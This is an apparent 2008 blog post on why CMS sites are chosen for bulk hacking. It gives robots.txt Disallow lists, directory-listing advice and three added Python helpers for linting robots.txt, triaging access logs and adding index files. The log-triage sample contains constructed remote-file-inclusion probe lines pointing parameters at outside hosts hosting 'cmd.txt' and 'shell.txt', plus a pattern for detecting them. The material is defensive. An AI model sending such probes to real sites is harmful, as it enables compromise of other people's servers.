Herself’s Webtools

Webtools for Webmasters: Scripts, HowTos, Templates, Plugins, Widgets, Tips and Useful Information


Why your site was chosen to be hacked and how to avoid being chosen

May 30th, 2008 · 2 Comments

Once upon a time only the larger websites got hacked, and the motive was to show off or to make a political statement.

Times have changed. Sites are now hacked in bulk, and the hack is done to plant links promoting less ethical websites or to deliver malware to the home PCs of your visitors.

So if your website was a victim of one of the recent bulk attacks, how did it get chosen?

The first thing that happens is that a security flaw is found in a commonly used CMS (content management system). It might be Coppermine, WordPress or any of the other popular systems. The more popular the software, the more people are looking for a weak spot in it.

Once a flaw is found, a script is written to exploit it.

Next a search is done to compile a list of sites running the software. For instance, if you use 'Acme photo content management' and a flaw is found in the file acme.php, then a search engine query for acme.php turns up every indexed site that exposes that file. A bot compiles the list and all the sites on it are attacked within a very short time. Alternatively, a Perl script is run against a large number of websites, probing each one for the flawed program (see RFI vulnerability scanner).

One way to help keep your site off that list is to keep those files out of Google and the other search engines. Use your robots.txt file to disallow every directory the public does not need to see. For WordPress, disallow /wp-admin and /wp-content/plugins. Go through your website and disallow in robots.txt all the directories not meant for public viewing. Two caveats. First, robots.txt only asks well-behaved crawlers not to index a path; an attacker's bot ignores it, and because the file is public it also reads as a list of your sensitive paths. So treat it as a way to shrink your search-engine footprint, not as access control, and protect files such as wp-config.php with file permissions and web server configuration as well. Second, each Disallow value is matched as a prefix of the request path, which always begins with a slash, so the value must begin with a slash too: Disallow: wp-config.php matches nothing, while Disallow: /wp-config.php does.

For WordPress I disallow:
User-agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/themes
Disallow: /wp-app.php
Disallow: /wp-atom.php
Disallow: /wp-blog-header.php
Disallow: /wp-comments-post.php
Disallow: /wp-config-sample.php
Disallow: /wp-config.php
Disallow: /wp-cron.php
Disallow: /wp-feed.php
Disallow: /wp-login.php
Disallow: /wp-links-opml.php
Disallow: /wp-mail.php
Disallow: /wp-pass.php
Disallow: /wp-rdf.php
Disallow: /wp-register.php
Disallow: /wp-rss.php
Disallow: /wp-rss2.php
Disallow: /wp-settings.php
Disallow: /wp-trackback.php
Disallow: /xmlrpc.php

For Coppermine I disallow:

Disallow: /coppermine/bridge
Disallow: /coppermine/docs
Disallow: /coppermine/images
Disallow: /coppermine/include
Disallow: /coppermine/lang
Disallow: /coppermine/logs
Disallow: /coppermine/plugins
Disallow: /coppermine/sql
Disallow: /coppermine/themes
Disallow: /coppermine/addfav.php
Disallow: /coppermine/addpic.php
Disallow: /coppermine/admin.php
Disallow: /coppermine/albmgr.php
Disallow: /coppermine/anycontent.php
Disallow: /coppermine/banning.php
Disallow: /coppermine/bridgemgr.php
Disallow: /coppermine/calendar.php
Disallow: /coppermine/catmgr.php
Disallow: /coppermine/CHANGELOG
Disallow: /coppermine/charsetmgr.php
Disallow: /coppermine/config.php
Disallow: /coppermine/COPYING
Disallow: /coppermine/db_ecard.php
Disallow: /coppermine/db_input.php
Disallow: /coppermine/delete.php
Disallow: /coppermine/displayecard.php
Disallow: /coppermine/displayreport.php
Disallow: /coppermine/ecard.php
Disallow: /coppermine/editOnePic.php
Disallow: /coppermine/editpics.php
Disallow: /coppermine/exifmgr.php
Disallow: /coppermine/faq.php
Disallow: /coppermine/forgot_password.php
Disallow: /coppermine/getlang.php
Disallow: /coppermine/groupmgr.php
Disallow: /coppermine/image_processor.php
Disallow: /coppermine/install.php
Disallow: /coppermine/installer.css
Disallow: /coppermine/keyword_create.dict.php
Disallow: /coppermine/keywordmgr.php
Disallow: /coppermine/login.php
Disallow: /coppermine/logout.php
Disallow: /coppermine/minibrowser.php
Disallow: /coppermine/mode.php
Disallow: /coppermine/modifyalb.php
Disallow: /coppermine/phpinfo.php
Disallow: /coppermine/picEditor.php
Disallow: /coppermine/pluginmgr.php
Disallow: /coppermine/profile.php
Disallow: /coppermine/ratepic.php
Disallow: /coppermine/README.TXT
Disallow: /coppermine/register.php
Disallow: /coppermine/relocate_server.php
Disallow: /coppermine/report_file.php
Disallow: /coppermine/reviewcom.php
Disallow: /coppermine/scripts.js
Disallow: /coppermine/search.php
Disallow: /coppermine/searchnew.php
Disallow: /coppermine/showthumb.php
Disallow: /coppermine/stat_details.php
Disallow: /coppermine/update.php
Disallow: /coppermine/upgrade-1.0-to1.2.php
Disallow: /coppermine/upload.php
Disallow: /coppermine/usermgr.php
Disallow: /coppermine/util.php
Disallow: /coppermine/versioncheck.php
Disallow: /coppermine/viewlog.php
Disallow: /coppermine/xp_publish.php
Disallow: /coppermine/zipdownload.php

See Robots.txt and how to use it.
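Before relying on a list like the ones above, it is worth checking mechanically that every sensitive path is actually covered. The following is an added example, not code from the original post: a small robots.txt matcher plus a lint pass. It applies the prefix rule of the robots.txt convention (a rule applies when its value is a prefix of the request path, the longest matching rule wins, Allow beats Disallow on a tie); wildcards are deliberately not implemented, and the sample file is constructed, with one entry missing its leading slash and one duplicated.

```python
"""Added example, not code from the original post: a minimal robots.txt
matcher and lint pass for checking a Disallow list before publishing it.

Matching follows the prefix rule of the robots.txt convention (and RFC 9309):
a rule applies when its value is a prefix of the request path, the longest
matching rule wins, and Allow beats Disallow on a tie. Wildcards ('*', '$')
are deliberately not implemented here."""

# Constructed sample, not any real site's file. It deliberately contains an
# entry without a leading slash and a duplicated entry.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /wp-admin
Disallow: /wp-content/plugins
Disallow: wp-config.php
Disallow: /wp-config.php
Disallow: /wp-admin
"""


def parse_rules(text):
    """Return the (directive, value) pairs from the 'User-agent: *' group."""
    rules = []
    in_group = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            in_group = (value == "*")
        elif in_group and key in ("allow", "disallow"):
            rules.append((key, value))
    return rules


def is_allowed(rules, path):
    """True if a crawler honouring these rules may fetch `path`."""
    # An empty value ("Disallow:") matches nothing, so it is skipped.
    matches = [(len(v), d == "allow") for d, v in rules if v and path.startswith(v)]
    if not matches:
        return True
    longest = max(n for n, _ in matches)
    return any(allowed for n, allowed in matches if n == longest)


def unblocked(rules, paths):
    """Paths from `paths` that a well-behaved crawler could still fetch."""
    return [p for p in paths if is_allowed(rules, p)]


def lint_rules(rules):
    """Flag values that can never match a request path, and duplicates."""
    problems, seen = [], set()
    for directive, value in rules:
        if value and not value.startswith("/"):
            problems.append(f"{directive}: {value!r} lacks a leading slash; "
                            "request paths start with '/', so it never matches")
        if (directive, value) in seen:
            problems.append(f"{directive}: {value!r} is listed more than once")
        seen.add((directive, value))
    return problems


if __name__ == "__main__":
    rules = parse_rules(SAMPLE_ROBOTS)
    for problem in lint_rules(rules):
        print("lint:", problem)
    print("still crawlable:",
          unblocked(rules, ["/wp-admin/", "/wp-login.php", "/wp-config.php"]))
```

Run it against your own file by reading it into `parse_rules` and passing the paths you care about to `unblocked`; anything it returns is still visible to a well-behaved crawler, and the lint output catches the missing-slash mistake that silently leaves a file indexable.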

Go through your logs, and if you see robots crawling your site that you don't recognise, find out who they are. If you still can't identify them, ban them using your .htaccess file. Bear in mind that the User-Agent string is whatever the client chooses to send, so a crawler claiming to be Googlebot is not necessarily Googlebot.
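The bulk attacks described earlier and the unknown robots mentioned here both leave traces in the access log. The following is an added example, not code from the original post: a triage pass over Apache combined-format log lines that flags remote-file-inclusion probes (a query parameter whose value is a URL, the signature of the RFI scanners referred to above), flags requests for paths that are meant to be non-public, and lists the crawlers that read robots.txt but are not on your allow-list. The log lines are constructed for the example, the non-public path list is an assumption based on the Disallow lists above, and acme.php is the post's own hypothetical plugin.

```python
"""Added example, not code from the original post: access-log triage for
RFI probes, requests for non-public paths, and unfamiliar crawlers."""

import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines; the addresses, paths and user agents are made
# up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [30/May/2008:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
203.0.113.9 - - [30/May/2008:10:00:07 +0000] "GET /coppermine/index.php?file=http://203.0.113.77/cmd.txt? HTTP/1.0" 200 612 "-" "libwww-perl/5.805"
203.0.113.9 - - [30/May/2008:10:00:08 +0000] "GET /wp-config.php HTTP/1.0" 403 210 "-" "libwww-perl/5.805"
198.51.100.4 - - [30/May/2008:10:01:13 +0000] "GET /wp-content/plugins/acme/acme.php?page=%68ttps://198.51.100.4/shell.txt HTTP/1.1" 404 300 "-" "Mozilla/4.0"
198.51.100.20 - - [30/May/2008:10:02:00 +0000] "GET /robots.txt HTTP/1.1" 200 800 "-" "UnknownCrawler/0.1"
198.51.100.20 - - [30/May/2008:10:02:01 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "UnknownCrawler/0.1"
"""

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Paths legitimate visitors never request. Assumption: drawn from the
# Disallow lists above; adjust to your own layout.
NON_PUBLIC = ("/wp-config.php", "/wp-admin/", "/coppermine/install.php",
              "/coppermine/phpinfo.php")
# Crawlers you have identified. The User-Agent is self-declared, so confirm a
# claimed Googlebot with a reverse-then-forward DNS check before trusting it.
KNOWN_CRAWLERS = ("Googlebot",)


def classify(target):
    """Reasons why one request target looks like scanner activity."""
    reasons = []
    parts = urlsplit(target)
    # parse_qsl percent-decodes values, so an obfuscated %68ttp:// is still seen
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            reasons.append(f"remote URL in parameter {key!r} (RFI probe)")
    if parts.path.startswith(NON_PUBLIC):
        reasons.append(f"request for non-public path {parts.path}")
    return reasons


def triage(log_text):
    """Return (suspicious hits, per-agent request counts, agents that read robots.txt)."""
    hits, agents, robots_readers = [], Counter(), set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; skip rather than guess
        rec = m.groupdict()
        agents[rec["agent"]] += 1
        if urlsplit(rec["target"]).path == "/robots.txt":
            robots_readers.add(rec["agent"])
        reasons = classify(rec["target"])
        if reasons:
            hits.append({"ip": rec["ip"], "agent": rec["agent"], "target": rec["target"],
                         "status": rec["status"], "reasons": reasons})
    return hits, agents, robots_readers


def unfamiliar_crawlers(robots_readers):
    """Agents that fetched robots.txt but match none of KNOWN_CRAWLERS."""
    return sorted(a for a in robots_readers
                  if not any(k in a for k in KNOWN_CRAWLERS))


if __name__ == "__main__":
    hits, agents, readers = triage(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["target"], "->", "; ".join(h["reasons"]))
    print("unfamiliar crawlers:", unfamiliar_crawlers(readers))
```

Feed it your real access log in place of the sample text. A 200 response to an RFI probe is the line to worry about; a 403 or 404 means the request was refused but still tells you which file names the scanner was looking for, which is useful input for the robots.txt and .htaccess work above.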

Next, check each directory on your website. If a directory has no index file (index.html, or whatever your server's DirectoryIndex setting names) and directory listings are enabled, then anyone who types that directory's URL into a browser is shown a list of every file in it.

You can prevent this by creating an index.html file and placing it in every directory that does not already have one. Mine just says 'You should not be here'. Yours could include a link back to the home page of the site or anything else you'd like. This keeps prying eyes out of places they should not be, although it does not stop someone who already knows a file's name from requesting it directly.
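Doing this by hand is tedious and easy to get wrong on a large site. The following is an added example, not code from the original post: it walks a document root, reports every directory with no index file, and drops the placeholder in where one is missing. The document root is a constructed temporary tree built by the script, and the set of index file names is an assumption standing in for your server's DirectoryIndex setting.

```python
"""Added example, not code from the original post: find directories under a
document root that have no index file, and add the placeholder described in
the post. Uses a constructed temporary tree so it runs stand-alone."""

import os
import tempfile

INDEX_NAMES = ("index.html", "index.htm", "index.php")   # assumed DirectoryIndex list
PLACEHOLDER = "<html><body>You should not be here.</body></html>\n"


def unindexed_dirs(docroot):
    """Directories (relative to docroot) that contain no index file."""
    missing = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        dirnames.sort()                                   # deterministic walk order
        if not any(name in filenames for name in INDEX_NAMES):
            missing.append(os.path.relpath(dirpath, docroot))
    return sorted(missing)


def add_placeholders(docroot, dry_run=False):
    """Write PLACEHOLDER as index.html into each unindexed directory.

    Returns the directories that were (or, with dry_run, would be) fixed.
    Opening with mode 'x' guarantees an existing file is never overwritten."""
    fixed = []
    for rel in unindexed_dirs(docroot):
        if not dry_run:
            with open(os.path.join(docroot, rel, "index.html"), "x", encoding="utf-8") as fh:
                fh.write(PLACEHOLDER)
        fixed.append(rel)
    return fixed


def build_sample_site():
    """Constructed WordPress-like layout in a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="docroot-")
    for rel in ("wp-admin", "wp-content/plugins/acme", "wp-content/uploads", "images"):
        os.makedirs(os.path.join(root, rel))
    for rel in ("index.php", "wp-admin/index.php", "wp-content/plugins/acme/acme.php"):
        open(os.path.join(root, rel), "w").close()
    return root


if __name__ == "__main__":
    site = build_sample_site()
    print("listable before:", unindexed_dirs(site))
    print("fixed:", add_placeholders(site))
    print("listable after:", unindexed_dirs(site))
```

Run it with `dry_run=True` against your real document root first to see what it would touch. Placeholders only cover the directories that exist today; turning listings off in the server as well (`Options -Indexes` in Apache's httpd.conf or in .htaccess where AllowOverride permits it) also covers any directory you or a plugin creates later.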

See also: Are your directories showing?

More information:
MySQL Injection attacks
3 Must Apply Security Tips for WordPress
How to secure WordPress sites

Tags: security · things you should know

2 responses so far

  • 1 Strangely // Jun 26, 2008 at 6:34 pm

    Neat article. I must get and check my robots.txt to see if I’ve missed anything off.
    You mentioned use of the .htaccess file in your post and also use of an index file in every folder. I used to do that but it’s very tedious. I found you can add Options All -Indexes to htaccess that will do the same thing for the whole site. However, you seem much more knowledgeable than me so do you know of a reason why this shouldn’t be used? Is there any advantage of one method over the other or even to use both at once?

  • 2 ljmacphee // Jun 26, 2008 at 9:58 pm

    No, that is a perfectly reasonable way to block directory access. Either method works fine. Thanks for mentioning it.
